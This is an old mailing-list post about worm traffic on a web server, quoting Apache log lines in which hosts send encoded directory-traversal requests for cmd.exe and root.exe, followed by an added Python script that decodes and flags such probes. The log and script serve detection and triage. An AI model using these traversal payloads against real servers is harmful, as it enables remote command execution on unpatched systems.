[plug] Is there *another* Windows worm around?

Kai vk6ksj at siwa.com.au
Tue Jan 28 19:49:30 WST 2003


> Looks like it could be, yeah. Note all the requests for
> ../winnt/system32/cmd.exe and such. OTOH, many worms aim for cmd.exe one
> way or another, so this could just be a resurgence of an old one. *lol*
> maybe all the MS-SQL admins reinstalled their servers and forgot to
> patch up IIS appropriately...
>
> craig at firewall:~$ tail -n 25 /var/log/apache/access.log
> 202.131.128.228 - - [28/Jan/2003:05:11:11 +0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.131.128.228 - - [28/Jan/2003:05:11:14 +0800] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.131.128.228 - - [28/Jan/2003:05:11:16 +0800] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.131.128.228 - - [28/Jan/2003:05:11:18 +0800] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.131.128.228 - - [28/Jan/2003:05:11:20 +0800] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 265
> 202.131.128.228 - - [28/Jan/2003:05:11:22 +0800] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:24 +0800] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:27 +0800] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:29 +0800] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:32 +0800] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 202.131.128.228 - - [28/Jan/2003:05:11:34 +0800] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 202.131.128.228 - - [28/Jan/2003:05:11:39 +0800] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.131.128.228 - - [28/Jan/2003:05:11:42 +0800] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 212.103.155.206 - - [28/Jan/2003:06:08:46 +0800] "GET /sumthin HTTP/1.0"
> 404 201
> 80.117.49.128 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html
> HTTP/1.1" 200 25810
> 202.72.156.26 - - [28/Jan/2003:11:26:48 +0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 202.72.156.26 - - [28/Jan/2003:11:26:57 +0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 202.72.156.26 - - [28/Jan/2003:11:27:06 +0800] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.72.156.26 - - [28/Jan/2003:11:27:16 +0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.72.156.26 - - [28/Jan/2003:11:27:26 +0800] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.72.156.26 - - [28/Jan/2003:11:27:36 +0800] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.72.156.26 - - [28/Jan/2003:11:27:45 +0800] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.72.156.26 - - [28/Jan/2003:11:27:56 +0800] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 265
> 64.229.155.191 - - [28/Jan/2003:12:21:42 +0800] "CONNECT
> maila.microsoft.com:25 / HTTP/1.0" 400 299
> 200.53.176.85 - - [28/Jan/2003:19:07:53 +0800] "GET /sumthin HTTP/1.0"
> 404 201
>

I get those annoying Nimda and Code Red accesses on my box on a daily basis;
I would've thought people had their boxes patched by now!
I'm also seeing a lot more of these "CONNECT maila.microsoft.com:25" too!
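A defender's triage script for log lines like the ones quoted above, added here as an example and not code from the original thread: it undoes the double, triple and overlong-UTF-8 encoding of the traversal so the Nimda / Code Red II cmd.exe and root.exe probes and the CONNECT relay attempts can be counted per source address. The sample log lines and their addresses are constructed, not taken from the poster's server.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+')  # common log format
# Constructed sample lines modelled on the quoted excerpt (source addresses from documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [28/Jan/2003:05:11:14 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
192.0.2.10 - - [28/Jan/2003:05:11:16 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
192.0.2.10 - - [28/Jan/2003:05:11:32 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
198.51.100.7 - - [28/Jan/2003:11:26:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
203.0.113.5 - - [28/Jan/2003:12:21:42 +0800] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 299
203.0.113.9 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html HTTP/1.1" 200 25810
"""

def normalize_path(raw: str) -> str:
    """Undo the encodings in the log: repeated %-decoding (%255c -> %5c -> \\; %%35%63 takes three
    rounds) and IIS's lenient decoding of overlong two-byte UTF-8 (%c0%af -> /, %c1%9c -> \\)."""
    data = raw.encode("latin-1")
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    data = re.sub(rb"[\xc0\xc1](.)", lambda m: bytes(
        [((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]), data, flags=re.DOTALL)
    return data.decode("latin-1").replace("\\", "/")   # compare with forward slashes only

def classify(line: str):
    """Return (source_ip, label) for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, request = m.group(1), m.group(2).split(" ")
    method, target = request[0], (request[1] if len(request) > 1 else "")
    if method == "CONNECT":
        return ip, "open-proxy probe"          # attempt to relay mail through the web server
    path = normalize_path(target.split("?", 1)[0])
    if path.lower().endswith(("/cmd.exe", "/root.exe")):
        # Code Red II / Nimda signature: traversal to cmd.exe, or the root.exe copy Code Red II leaves
        return ip, "IIS cmd.exe/root.exe probe" + (" (traversal)" if "/../" in path else "")
    return ip, "benign"

def summarize(log_text: str) -> Counter:
    counts = Counter()   # (source IP, label) -> hits; benign and unparsable lines are dropped
    for line in log_text.splitlines():
        hit = classify(line)
        if hit and hit[1] != "benign":
            counts[hit] += 1
    return counts
```

Running `summarize(SAMPLE_LOG)` groups the three differently encoded cmd.exe requests from one source into a single counter entry, which is the view you want before deciding whether to block a source or just confirm your own IIS hosts are patched.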


